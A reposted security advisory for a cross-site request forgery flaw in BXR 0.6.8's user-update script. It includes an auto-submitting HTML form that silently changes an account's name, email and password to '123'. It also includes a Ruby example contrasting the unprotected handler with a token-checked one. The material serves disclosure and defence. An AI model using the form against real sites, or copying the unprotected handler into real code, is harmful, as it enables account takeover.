[Repost] BXR v0.6.8 CSRF Vulnerability
Posted on: 2010-8-7 16:05 1965

Vulnerability ID: HTB22503  

Reference: [link unavailable]

Product: BXR  

Vendor: Hulihan Applications

Vulnerable Version: 0.6.8 and Probably Prior Versions  

Vendor Notification: 22 July 2010  

Vulnerability Type: CSRF (Cross-Site Request Forgery)  

Status: Fixed by Vendor  

Risk level: Low  

Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing

Vulnerability Details:  

The vulnerability exists because the "/user/update" script fails to properly verify the source of HTTP requests.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, or disclosure or modification of sensitive data.

An attacker can use a browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/user/update/1" method="post" name="main">
  <input type="hidden" name="user[name]" value="admin" />
  <input type="hidden" name="user[email]" value="myemail (at) example (dot) com [email concealed]" />
  <input type="hidden" name="user[password]" value="123" />
  <input type="hidden" name="user[password_confirmation]" value="123" />
  <input type="hidden" name="belongs_to_group[1]" value="yes" />
  <input type="hidden" name="user[default_folder_id]" value="1" />
  <input type="hidden" name="commit" value="Save" />
</form>
<script>
  document.main.submit();
</script>


Solution: Upgrade to the most recent version
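The missing check described above, as an added defensive example that is not part of the advisory or of BXR's own code: a minimal Ruby handler in the shape of the vulnerable "/user/update" action beside a hardened version that requires a per-session synchronizer token and a same-origin Origin header (the pattern Rails' protect_from_forgery implements; Ruby is chosen because the PoC's `user[...]`/`commit` parameters have the shape of a Rails form). The session layout, the `https://host` origin and both request hashes are constructed assumptions.

```ruby
require 'securerandom'

# Constant-time string comparison so token validation does not leak timing information.
def secure_compare(a, b)
  return false unless a.is_a?(String) && b.is_a?(String) && a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Hypothetical session layout (assumption; BXR's real session is not on the page).
def new_session
  { user: { "name" => "alice", "email" => "alice@example.test" },
    csrf_token: SecureRandom.hex(32) }
end

# Shape of the vulnerable action: any POST that carries the session cookie is applied.
def update_user_unprotected(session, request)
  session[:user].merge!(request[:params].fetch("user", {}))
  [200, session[:user]]
end

# Hardened action: require a per-session synchronizer token and a same-origin Origin header.
def update_user_protected(session, request, site_origin: "https://host")
  token  = request[:params]["authenticity_token"]
  origin = request[:headers]["Origin"]
  return [403, "missing or invalid CSRF token"] unless secure_compare(token, session[:csrf_token])
  return [403, "cross-origin request blocked"] unless origin == site_origin
  update_user_unprotected(session, request)
end

# Constructed forged request: the advisory's auto-submitting form, as the server sees it.
def forged_request
  { headers: { "Origin" => "https://attacker.example" },
    params:  { "user" => { "name" => "admin", "password" => "123" }, "commit" => "Save" } }
end

# Constructed legitimate request: the same form rendered by the site itself, token included.
def legit_request(session)
  { headers: { "Origin" => "https://host" },
    params:  { "authenticity_token" => session[:csrf_token],
               "user" => { "email" => "alice@new.example.test" }, "commit" => "Save" } }
end

if __FILE__ == $PROGRAM_NAME
  p update_user_unprotected(new_session, forged_request)  # 200: account silently changed
  p update_user_protected(new_session, forged_request)    # 403: no token for this session
  s = new_session
  p update_user_protected(s, legit_request(s))            # 200: same-origin, token matches
end
```

The Origin comparison is only a secondary check, since browsers of that era did not send the header reliably; the per-session token is the control that actually closes the hole.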
